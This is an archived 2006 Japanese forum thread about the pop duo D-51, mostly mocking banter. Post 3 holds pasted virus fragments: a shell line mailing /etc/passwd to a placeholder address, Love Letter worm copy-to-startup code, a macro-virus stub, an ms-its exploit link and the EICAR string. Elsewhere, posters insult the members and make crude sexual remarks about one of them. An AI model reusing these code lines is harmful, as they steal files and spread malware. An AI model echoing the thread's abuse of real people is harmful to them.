2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【世界の】D-51 part.812【Topデュオ】

1 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:00:14 ID:cwi4EmiD0
世界のTopデュオ、12オクターブの声域をもつ天使の歌声・・・

そんなD-51を応援するスレッドです。

2 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:01:06 ID:zc+F3gZX0
紙だわ

3 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:02:09 ID:8PBDYIp50
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

4 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:03:37 ID:BxAEf1ox0
前スレ

( ´ω` )D-51-2(`ε´)
http://music5.2ch.net/test/read.cgi/musicjg/1124086526/

5 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:03:48 ID:O7bYzbEXO
YASUのヌードが見たい

6 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:05:12 ID:cwi4EmiD0
982 :名無しさん@お腹いっぱい。:2006/10/08(日) 15:16:16 ID:2hyv3JQJ0
2006.10.08.(Sun)  ダイエット成功者は語る!!

バスケで楽しく痩せることを覚えたヤッちゃん!!
自他共に認めるおしゃれさんです。
アーティストはルックスも大事ですからねぇ♪
モデルっぽく撮ってみたんですけど、
なんか広告の写真みたいになっちゃったw


>アーティストはルックスも大事ですからねぇ♪
>アーティストはルックスも大事ですからねぇ♪
>アーティストはルックスも大事ですからねぇ♪
>アーティストはルックスも大事ですからねぇ♪
>アーティストはルックスも大事ですからねぇ♪
>アーティストはルックスも大事ですからねぇ♪


ワラタwwwwwWWWWWWWWWwwwwwwwwwwwwwwwwwwwwwWWWWWWWWWWWWWWWWwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

7 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:07:05 ID:vG+jPMYo0
>>1

8 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:07:51 ID:cwi4EmiD0
NO MORE CRYって何回聴いてもウンコ臭い曲だわ><

9 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:09:24 ID:cwi4EmiD0
YASUってキモ杉、、、

10 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:11:31 ID:zc+F3gZX0
D-51ってデビュー曲の頃は それなりに売れそうなアーのオーラを微妙に出してたわ


最近はアイドル臭い曲が主流ねん

11 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:11:40 ID:cwi4EmiD0
YASUのチンコ萎え↓↓(オエーッ!!)

12 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:12:30 ID:cwi4EmiD0
>>10
NO MORE CRYゎ好きカナ???

13 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:14:07 ID:cwi4EmiD0
コイツらのパンツにゎいつも臭いウンコがへばりついてそう

キモッ

14 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:14:53 ID:zc+F3gZX0
>>12

あんまり好きじゃないわんwwww




15 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:16:13 ID:BxAEf1ox0
http://www5f.biglobe.ne.jp/~d-51/index2.htm

16 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:16:40 ID:cwi4EmiD0
>>14
ワラタ

コイツらキモいから早く死ねばいいのに、、、

17 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:18:21 ID:O7bYzbEXO
12オクターブってマジ?

18 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:18:48 ID:cwi4EmiD0
>>17
マジだケド何か???

19 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:21:11 ID:cwi4EmiD0
コイツらって不細工なくせにヤリチンっぽいゎ

『キモッ』

20 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:21:24 ID:zc+F3gZX0
D-51がデビュー曲から毎回 CDTVに出てるのが謎だわwwwwwwww

21 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:22:45 ID:BxAEf1ox0
D-51

沖縄在住のボーカルデュオ。D-51というグループ名は全国を駆け巡っていた機関車D-51からとって、
彼らが通っていた音楽スクールの校長が命名。
2003年6月より、沖縄県北谷町ミハマ・カーニバルパーク広場でストリートライブをスタート。
最初は緊張の面持ちだった彼らも、次第に人前で歌う喜びを噛みしめるようにのびのびと歌いだした。
時には沖縄ならではの炎天下や雨天に悩まされることもあったが、根気強く道行く人へ歌を届け続け、
日が経つに連れ、ひとり、またひとりといつしか多くの人が彼らの歌声に足を止めていた。
そして瞬く間に会場限定で販売していた自主盤『LET’s TRY』を5000枚売り切り、 2004年2月にミニアルバム『STREET BREEZE』をインディーズリリース。
このアルバムは県内TOWER RECOADにてインディーズチャート1位を記録し、4月には全国発売にまで至った。
そして同年7月7日、シングル『TOP OF THE SUMMER』でポニーキャニオンよりメジャーデビュー。
2005年2月発売の3rdシングル『NO MORE CRY』はTVドラマ『ごくせん』の主題歌に抜擢し、オリコン初登場2位の大ヒットを記録。
翌3月、『NO MORE CRY』を含む、これまでのシングル曲全て収録した1stアルバム『ONENESS』をリリース。
デビューから1年半となる2005年12月にはNHK紅白歌合戦の出場も果たした。
2006年3月、映画『ALWAYS〜三丁目の夕日〜』の主題歌『ALWAYS』を含む、全11曲を収録した2ndアルバム『2GETHER』をリリース。
現在はTVアニメ『ワンピース』主題歌、『BRAND NEW WORLD』を引っさげて全国のイベントに精力的に出演。
沖縄美浜からの南風に乗って、彼らの快進撃はまだまだ続く!

22 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:22:52 ID:aTBX9Okr0
>>16
自分でスレ立てといて早く死ねばいいのにって笑えるwwww

23 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:23:13 ID:cwi4EmiD0
>>20
売れてないくせにマジウザイゎ、、、><

ALWAYSゎ好きカナ???

24 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:23:50 ID:BxAEf1ox0
YU
上里優
1983.11.9沖縄県宜野湾市出身


小さな頃から好きだったサッカーに、Yuは高校2年になるまで熱中していた。
そんなサッカーづけの高校生に同級の友人があるビデオを貸してくれた。
それまでサッカー少年だったYuに、衝撃とともに飛び込んできた映像、それは当時大阪で活躍していたダンスチーム『ブロンクス』のパフォーマンスだった。 ブロンクスのダンスにすっかりハマり、
友人らとダンスチームを組み、ブレイキングやポッピング、ロックなどいろいろなスタイルを吸収したオリジナルのダンスで、ストリートに出て踊り始めた。
そうして踊りを続けていくうちに、もともと歌にも興味を持っていたYuは、バックに流れているダンスミュージックの実力派シンガーらに魅了され、『本格的に歌を歌ってみたい』と思うようになる。
ひとり音楽スクールの門をたたき、歌のレッスンに通い始め、そこで歌の基礎を叩き込まれた。
しばらく一人で歌う日々が続いていたが、半年ほど過ぎたある日、明らかに違う個性を持ったYASUと出会う。
試しに二人で一つの楽曲を歌ってみたのをきっかけに、二人で歌うことの難しさや楽しさを覚え、お互いの夢を話し合うようになり、デュオを結成。D−51として歌い始める。

YASU
吉田安英
1982.4.6沖縄県那覇市出身

好奇心旺盛で、さまざまなことに興味を示すが長続きしなかったYASU。中学でバスケを始めるも2年程でやめてしまった。    
高校のときには沖縄で盛んなハンドボールに手を出すが、当時『自分に甘える気持ち』を克服できなかったYASUは、これも数週間で『自分には向いていない』とあきらめてしまう。    
そんなYASUが音楽と出会ったきっかけは、同級生らが楽器を持ち始め、YASUはボーカルとしてバンドを組んだときだった。
『モテたい』というカルい考え(笑)で始めたのだが人前で歌う楽しさや、言いようのない快感を覚え、『オレがやりたかったのはこれだ!』と、気が付くとすっかり歌うことにはまってしまっていた。
しかし高校卒業を機にメンバーは沖縄を離れ、残ったYASU自身も音楽から離れることになる。  
それから約1年後、まだ歌うことをあきらめていなかったYASUは、バンド関係の友人に紹介された音楽スクールでレッスンを受け始める。 大好きな歌をもっとよく歌えるようになる為、自らに甘い性格を克服していこうと決意した。    
そこでYUと出会い『二人の個性をぶつけ合うこと』に、新たな可能性を見出し、デュオとして、D−51として歌い始める。

25 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:24:06 ID:O7bYzbEXO


26 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:24:50 ID:zc+F3gZX0
>>23

あんまり好きじゃないわwwwwwwww

D-51じゃないアーが歌ったら結構 良曲になる気がするわww

27 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:25:22 ID:cwi4EmiD0
>>24
どうしようもなくキモいのネ コイツら、、、
アンチになりそう

28 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:26:13 ID:O7bYzbEXO
野茂暗い

29 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:26:59 ID:TB4oQXk+0
>そんなYASUが音楽と出会ったきっかけは、同級生らが楽器を持ち始め、YASUはボーカルとしてバンドを組んだときだった。
>『モテたい』というカルい考え(笑)で始めたのだが

動機がカスレベルだね。
アーティスト面しないでね。

30 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:27:48 ID:BxAEf1ox0
http://www5f.biglobe.ne.jp/~d-51/works/street_breeze_buy.html

31 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:27:57 ID:cwi4EmiD0
D−51にアーティスト的要素がひとかけらもない件

32 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:28:00 ID:zc+F3gZX0
YASUってモテたいから音楽始めたのねwwwwwwwwww

笑えるわwww

33 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:28:49 ID:O7bYzbEXO
D-51きんもー☆

34 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:29:34 ID:cwi4EmiD0
>>30
何コレ???

35 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:29:58 ID:zc+F3gZX0
新曲は壮大にコケソウだわwww

36 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:31:08 ID:cwi4EmiD0
>>35
売り上げ予想して〜ん♪www

37 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:31:10 ID:BxAEf1ox0
http://www5f.biglobe.ne.jp/~d-51/fc.html

D-51のファンクラブ会員は今何人いるだろう?w

38 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:31:39 ID:X5zKrWT/0
お前ら前スレ見てないのか?
YASUはゲイに大人気なんだぞ。
YASUはぽっちゃりしたほうがよかっただの熱い議論が交わされてた。

39 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:32:34 ID:cwi4EmiD0
>>38
キモいわwwwwwwwwwwwwwwwwWWWWWWWWWWWWWWWWwwwwwwwwwwwwwwwwwwwwwwwwwwwwwWWWWWWWWWWWWwwwwwwwwwwwwwwwwwwwwwwwwwww

40 :Name of love ◆Pn0C1JL8xs :2006/10/10(火) 23:32:40 ID:zc+F3gZX0
>>36

初動2000枚 累計3000枚


と予想するわん

41 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:32:54 ID:BxAEf1ox0
YASUよりはYUの方がマシ

42 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:33:05 ID:O7bYzbEXO
>>38
気持ち悪い・・・

43 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:33:54 ID:BxAEf1ox0
http://www5f.biglobe.ne.jp/~d-51/profile.html

YASU(笑)

44 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:33:56 ID:cwi4EmiD0
>>40
そんなに売れたら大確変じゃないのwwwwwwwwwww

あたしゎ初動721枚 累計1105枚と予想するわ

45 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:35:19 ID:BxAEf1ox0
http://wisemusic.jp/takabbs_xg/list.php

46 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:35:25 ID:O7bYzbEXO
>>43
髪型から服装まで何もかも終わってるな

47 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:36:39 ID:HWIJShVX0
>>43
ウホッいい男

48 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:36:46 ID:cwi4EmiD0
>>45
珍種が揃っててワラタwwwwwwwwwwwwwwwwwwwWWWWWWWWWWWWwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

49 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:37:25 ID:kw3tzluJ0
YASUのむんむんフェロモンの魅力を理解できないおまえらはKASU

50 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:37:28 ID:BxAEf1ox0
YASUって犯罪者みたい

51 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:38:01 ID:O7bYzbEXO
YASUってただ太いだけじゃん

52 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:38:39 ID:BxAEf1ox0
よかった。
岡山には行けないけど、またどこかで会えるといいですね。
D‐51のファンになって、いろんな出会いが出来てます。
人や場所やステキな音楽…このBBSを見てると、全国のD‐51ファンが、ここでつながっているんだなぁと感じます。

今度わたしたちは、町内の秋祭りでBRAND NEW WORLDを歌うことになりました。恥ずかしいから「いやだ!」と言っていたんですが、昨日マイクのテストのためステージで歌ったら、これがなかなか気持ちいい〜のです。
まだまだいろんな世界が広がって行くようで、楽しみです。





wwwwwwwwwwwwwwwwwwwwWWWWWWWWWWWWwwwwwwwwwwwwwwwwww

53 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:40:12 ID:O7bYzbEXO
>>52
ワロス

54 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:41:50 ID:cwi4EmiD0
コイツらが解雇されるまで叩き続けるカラ

『覚悟しな』

55 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:42:13 ID:MPgU99yW0
全国のD-51ファンはそこにしか場所がないんだろうねw

56 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:45:15 ID:O7bYzbEXO
D-51って解雇されないのが不思議だよね

57 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:45:58 ID:cwi4EmiD0
D−51って何もかもキモい、、、

58 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:46:18 ID:DVvJpkk+0
マピミなんかに負けない
YASUのアナルは俺が守るカラ

59 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:47:03 ID:O7bYzbEXO
YASUに恋するゲイ達・・・オエッ

60 :マピミ♪姫 ◆ewG.tcATUA :2006/10/10(火) 23:51:49 ID:cwi4EmiD0
D−51で遊ぶのも飽きたわ、、><

61 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:52:21 ID:O7bYzbEXO
野茂暗い

62 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:53:59 ID:LttljyPB0
>>60
マピミ敗北宣言www

63 :名無しさん@お腹いっぱい。:2006/10/10(火) 23:57:40 ID:oOqmu5or0
悪は滅びる運命

64 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:01:51 ID:BxAEf1ox0
http://vista.undo.jp/img/vi6049248688.jpg

65 :マピミ♪姫 ◆ewG.tcATUA :2006/10/11(水) 00:08:23 ID:Ptl/Oskf0
>>64
キモ、、、

66 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:08:33 ID:JSPrfrAC0
>>64
なんだよこれww

67 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:11:41 ID:wXTr+6dl0
http://vista.undo.jp/img/vi6049307985.jpg

68 :マピミ♪姫 ◆ewG.tcATUA :2006/10/11(水) 00:12:34 ID:Ptl/Oskf0
>>67
ワラタ

69 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:14:14 ID:+fbCPYT80
大好きなYASUがいっぱい〜

70 :Name of love ◆Pn0C1JL8xs :2006/10/11(水) 00:17:40 ID:TUncdKkn0
YASUヲタなんて存在するのね

71 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:31:30 ID:wXTr+6dl0
http://vista.undo.jp/img/vi6049424371.jpg

72 :名無しさん@お腹いっぱい。:2006/10/11(水) 00:55:17 ID:Wv8cGIbAO
>>71
ワロスwww

73 :名無しさん@お腹いっぱい。:2006/10/11(水) 01:24:49 ID:Z7NkczXb0
職人はどうせならYASUのヌードコラ作ってよ

74 :名無しさん@お腹いっぱい。:2006/10/11(水) 01:26:16 ID:wXTr+6dl0
コラなんて無理
職人というかただ画像表示ソフト使ってるだけだから…

75 :名無しさん@お腹いっぱい。:2006/10/11(水) 02:03:57 ID:8vRw9ofr0
職人ももうYASUのむちむちフェロモンのとりこだねw

76 :名無しさん@お腹いっぱい。:2006/10/11(水) 02:26:36 ID:j+j3hpFp0
久しぶりに来てみたらいつの間にか前スレオワーテたー!
12オクターブはおる意味合ってるwwww
新曲早く聴きてーなー

77 :名無しさん@お腹いっぱい。:2006/10/11(水) 02:38:05 ID:j+j3hpFp0
Brand new〜は確かにくそだったな。アニソン好きにはいいかもしれんが。
こいつらは音域が高ければ売れるとでも思ってるんだろうか。
デゴ人気再燃するためには、もっとR&B色を濃くして楽曲のクオリティを
上げないとダメだね。あとYASUがもっと太って短髪になって、ゲイへの
アプローチを試みれば完璧。でもこれはYASUはヤリチンだから無理かもね。
YUはもっとキャラを確立させる事と、歌唱力を上げる事に専念しないとwww

78 :名無しさん@お腹いっぱい。:2006/10/11(水) 13:32:28 ID:Wv8cGIbAO
↑D-51ヲタ きたww

79 :名無しさん@お腹いっぱい。:2006/10/11(水) 13:56:17 ID:1/I2P1R/0
YASUがキャラ確立させろよ

80 :マピミ♪姫 ◆ewG.tcATUA :2006/10/11(水) 16:04:59 ID:Ptl/Oskf0
コイツらって凄いデカイウンコ発射しそぅ、、、

81 :名無しさん@お腹いっぱい。:2006/10/11(水) 18:58:02 ID:ofalRpiuO
喋りやすいのはYUくんやな。YASUくんはまだ恥ずかしい(笑)

82 :名無しさん@お腹いっぱい。:2006/10/11(水) 21:49:35 ID:s+oEPKT30
>>80
マピミもYASUのウンコのとりこだねw

83 :マピミ♪姫 ◆ewG.tcATUA :2006/10/11(水) 22:30:40 ID:Ptl/Oskf0
D−51ヲタって2ちゃんに1人しかいないのネ、、、

84 :マピミ♪姫 ◆ewG.tcATUA :2006/10/12(木) 22:13:39 ID:ugzIgDti0
D−51ヲタが死んだ件

85 :名無しさん@お腹いっぱい。:2006/10/12(木) 22:19:53 ID:9amoGlyf0
人いねー(笑)

86 :マピミ♪姫 ◆ewG.tcATUA :2006/10/12(木) 23:03:19 ID:ugzIgDti0
こんなどうしようもないウンコデュオにヲタが沢山いる方がおかしいんだケド(失笑)

87 :名無しさん@お腹いっぱい。:2006/10/13(金) 01:20:22 ID:JGtJ5JZiO
ウンコ言うなウンコ

88 :名無しさん@お腹いっぱい。:2006/10/14(土) 01:35:27 ID:1Y4e0EsG0
丸一日レスがない(笑)

89 :名無しさん@お腹いっぱい。:2006/10/14(土) 23:14:39 ID:LW9TcrUV0
YASUはマジで可愛いな。。。チンコしゃぶりたい。

90 :マピミ♪姫 ◆ewG.tcATUA :2006/10/15(日) 02:08:51 ID:3wa7dvN70
↑YASUヲタのホモきたゎwwww

91 :マピミ♪姫 ◆ewG.tcATUA :2006/10/16(月) 19:35:49 ID:ERgV8/yW0
D−51にヲタがいないことが証明された件、、、wwww

92 :名無しさん@お腹いっぱい。:2006/10/17(火) 15:12:37 ID:krAthzbW0
なんでこんなに可愛いのかよ
YASUという名の宝物

93 :名無しさん@お腹いっぱい。:2006/10/17(火) 18:54:32 ID:ORBRF/tQ0
>>92
お前カンニングの竹山も好きだろww

94 :名無しさん@お腹いっぱい。:2006/10/17(火) 21:14:33 ID:g1D/AjFgO
二人とも歌い方変わったよなー
昔のほうが控え目な感じでよかった
今力入りすぎ(笑)

95 :マピミ♪姫 ◆ewG.tcATUA :2006/10/17(火) 22:40:20 ID:MA47I4QR0
YASUのチンコってキモそう、、、

96 :名無しさん@お腹いっぱい。:2006/10/21(土) 16:05:28 ID:M0d3EVK2O
D-51スレが盛り上がらない理由
それはD-51ヲタには高貴な政治家や権力者が多く、2ちゃんねるのような腐った場所には来ないからである
また、D-51は海外の人気も高く、プロのメタラーやクラシック作曲家も「D-51はガチ」と口を揃えて言う
つまり、D-51はお前らのような腐った考えの奴等には到底理解出来ない素晴らしい音楽なのである

97 :名無しさん@お腹いっぱい。:2006/10/23(月) 00:50:24 ID:98v7rsCT0
YASUの底なしのエロスが

98 :名無しさん@お腹いっぱい。:2006/10/27(金) 21:56:25 ID:20GEpFwv0
>>96の完璧な理論にアンチもタジタジ

99 :名無しさん@お腹いっぱい。:2006/10/28(土) 19:59:13 ID:lKbrX3k10
楽曲が大衆受けを狙い始めたらおわりだね。

100 :名無しさん@お腹いっぱい。:2006/10/29(日) 15:12:21 ID:vxjxThB/O
てかもう影薄いでしょ

101 :名無しさん@お腹いっぱい。:2006/10/29(日) 18:30:21 ID:Nz6CwdVwO
腐った人間には理解出来ない音楽だからな

102 :名無しさん@お腹いっぱい。:2006/10/30(月) 21:05:09 ID:AmEDkNMc0
D-51が歌ってるような気がするんだけど、曲名がわからない。
ノリが良くて、ラバラバ!とか言ってる歌ある?

103 :名無しさん@お腹いっぱい。:2006/11/01(水) 02:31:02 ID:XZTfSXXM0
それWaTじゃない?Hava Rava

104 :102:2006/11/01(水) 21:10:20 ID:HCmreBT/0
すまん、Hava Ravaの歌詞を見てみたけど、多分違う感じがする。
D-51じゃないのかな。
サビのテンポとかノリがBrand New Worldそっくりの曲

105 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:53:33 ID:nuFBsYqf0
歌詞覚えてないの?
覚えてたら載せてみて。

106 :名無しさん@お腹いっぱい。:2006/11/02(木) 01:07:37 ID:/c1cMSvKO
なんだこのスレ
ウンコとチンポの話題しかねーのか?
書き込んでるやつもゲイばかりだし。

107 :名無しさん@お腹いっぱい。:2006/11/03(金) 13:50:36 ID:DkifN7uq0
ラバラバはこれだろ↓
「ジャンパップその場でyes yes!!」
バッカナルTIMEって曲だよ。2getherのアルバムにも入ってるよ確か。
全然Brand New Worldとノリちゃうと思うが(汗)

108 :102:2006/11/04(土) 01:54:06 ID:RhuUhvkl0
何の曲だかわかりました。
別のアーティストで恋のメガラバという曲でした。
全然似てねぇだろとか言われそうだけど・・・。

109 :名無しさん@お腹いっぱい。:2006/11/04(土) 14:07:52 ID:eHMA7MqiO
神聖なるD-51様のスレで何事だ 今すぐ出ていきなさい
893に目ぇ付けられるぞ

110 :名無しさん@お腹いっぱい。:2006/11/04(土) 17:49:34 ID:mYssfZmk0
YASU痩せてフェロモンが落ちた。
がりじゃなくガチムチになってほしい。

111 :名無しさん@お腹いっぱい。:2006/11/05(日) 00:26:00 ID:GjwUx7Z80
全然似てねぇだろw

112 :名無しさん@お腹いっぱい。:2006/11/06(月) 01:56:22 ID:6s26ofEiO
ところで新曲はまだですか?
まあD-51様は一曲一曲に全身全霊を込めてるのは分かるが、そろそろ出さないと
世界中で飢えによる暴動が起こるぞ

113 :名無しさん@お腹いっぱい。:2006/11/08(水) 11:06:02 ID:nKiaDETu0
今月やっと出るぞ
これでD-51様の新曲の飢餓感による
世界中のフーリガンによる暴動、中東の紛争、
北朝鮮の核ミサイル開発などがとりあえず収まるだろう。

新曲を聴いて3日後にはまた新曲が聴きたくなるのであくまで一時的なものだが。

114 :名無しさん@お腹いっぱい。:2006/11/12(日) 14:25:37 ID:Rldpk3WT0
D-51のジャケのYASUで毎回オナニーしてます

115 :名無しさん@お腹いっぱい。:2006/11/12(日) 14:40:05 ID:tm6eJKaAO
神でオナニーとは…恐れ多い行動だ

116 :名無しさん@お腹いっぱい。:2006/11/14(火) 22:56:25 ID:FBH6KpTSO
11/29に新曲発売というのにこの過疎っぷりw
今度の新曲は金正日を批判した過激な歌詞らしいぜ
さすがD-51様だ

117 :名無しさん@お腹いっぱい。:2006/11/14(火) 23:56:09 ID:D/d9p1Il0
同じ人しか書き込んでないし。
くだらん。

118 :名無しさん@お腹いっぱい。:2006/11/15(水) 03:40:15 ID:XPLX+EvJ0
創価学会

119 :きみ:2006/11/17(金) 14:28:16 ID:cjBK9v750
D-51好きだあ!!
新曲発売が待ち遠しい!!!

120 :名無しさん@お腹いっぱい。:2006/11/21(火) 11:51:46 ID:D9peNgwG0
11月27日に名古屋の栄のラシックで公開生だよ

121 :名無しさん@お腹いっぱい。:2006/11/24(金) 18:51:42 ID:t8o2wZ3RO
物凄い過疎だな
まあD-51のプログレ風オルタナヒップホップ的メタルを理解出来ない奴が多いのが現状だけど

122 :名無しさん@お腹いっぱい。:2006/11/24(金) 19:44:20 ID:aoWUEHA5O
てかD-51がトップデュオとか言ってこいつらかなり痛いなwwwはっきりいってこいつらの曲はかなりクオリティ低いぞwwとりあえずトップデュオっていう勘違いはやめてねカス共(^^)v

123 :名無しさん@お腹いっぱい。:2006/11/25(土) 00:07:11 ID:LPkMCC12O
こいつらの曲の良さが分からない奴には音楽センスのかけらも無い
今世界はToolかD-51かって言われてるぐらいだからな

124 :はる:2006/11/25(土) 21:30:03 ID:7DQ3lf2V0
でもライブ超楽しいし一度見たら絶対好きになりますよ!!


125 :名無しさん@お腹いっぱい。:2006/11/26(日) 04:12:26 ID:Kn5fQ1hz0
ライブはすごく楽しい!!

126 :名無しさん@お腹いっぱい。:2006/11/26(日) 09:32:33 ID:h9jI3fQf0
ライブはYASUが脱いでくれるのか?
それなら楽しいが

127 :名無しさん@お腹いっぱい。:2006/11/27(月) 00:16:09 ID:C96sEcE30
YASUのチンチン舐めたいよぅ

128 :名無しさん@お腹いっぱい。:2006/11/27(月) 02:07:53 ID:N0boaGpmO
D-51ファンなボーイはみんなゲイ

129 :名無しさん@お腹いっぱい。:2006/11/28(火) 21:36:18 ID:Vjp9u44OO
やべえええw
新曲フラゲ日なのに誰もいねえw

130 :名無しさん@お腹いっぱい。:2006/11/28(火) 22:51:22 ID:I4StXbGo0
言えてる↑
俺デゴ好きだけどまだ一度も新曲耳に入ってないよ。
プロモーションにもお金かけられなくなってきてるのかな。

131 :名無しさん@お腹いっぱい。:2006/11/29(水) 19:49:21 ID:Gcnqhx4d0
今ラジオでなんとかクリスマス?っていう新曲聞いたけど
普通に良い曲だね。

132 :名無しさん@お腹いっぱい。:2006/12/01(金) 07:28:53 ID:eZFim/HJO
ALWAYS

133 :名無しさん@お腹いっぱい。:2006/12/01(金) 12:38:15 ID:L9jKsJEB0
PVでYASUが脱ぐだけで20万枚は売り上げが上がるのにな

134 :名無しさん@お腹いっぱい。:2006/12/01(金) 12:42:24 ID:cCzCG/jR0
この前沖縄行ったらまるで人気あってかなり売れてるかのように
CDショップにポスターとか貼りまくってあった
ラジオで全然流れてなかったけど

135 :名無しさん@お腹いっぱい。:2006/12/01(金) 22:27:09 ID:SNPfgLDwO
「はじまる」はD-51に興味ない人が聴いて、これいい曲だな、CD買おう。って思えるほどのレベルじゃないな。
アルバムの良曲レベルって感じ。
やっぱりDreamin'on路線が一番いいな…。

136 :名無しさん@お腹いっぱい。:2006/12/02(土) 17:48:35 ID:XO7VD2Fm0
微妙な曲をプッシュするにはYASUがヌードになるしかない

137 :名無しさん@お腹いっぱい。:2006/12/03(日) 15:56:38 ID:lBg4VYpi0
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

138 :名無しさん@お腹いっぱい。:2006/12/04(月) 02:47:33 ID:iHtl/nva0
俺もDreamin'onが一番好き!!あれは名曲!

139 :名無しさん@お腹いっぱい。:2006/12/04(月) 03:31:51 ID:fKEuEds2O
>>136
YASUが脱いだらCD売れすぎて、ジャニとエイベに目付けられて潰されちゃうよ
まあD-51様の実力は半端無いし、裏の世界でも相当の名を持ってるみたいだから大丈夫だと思うがな

140 :名無しさん@お腹いっぱい。:2006/12/05(火) 13:40:21 ID:/ZMCiY4S0
タキツバ路線で行くのもありだな(笑)
アクターズスクールのイケメンを20人くらいバックダンサーに従えて☆

141 :名無しさん@お腹いっぱい。:2006/12/08(金) 10:44:51 ID:3F5aIhdr0
20人のイケメンに輪姦されるYASUきぼん

142 :名無しさん@お腹いっぱい。:2006/12/08(金) 21:10:20 ID:WaubnHxf0
昨日やっとはじまるを聞けたよ。ノモクラでの盛り上がりを再燃させようと
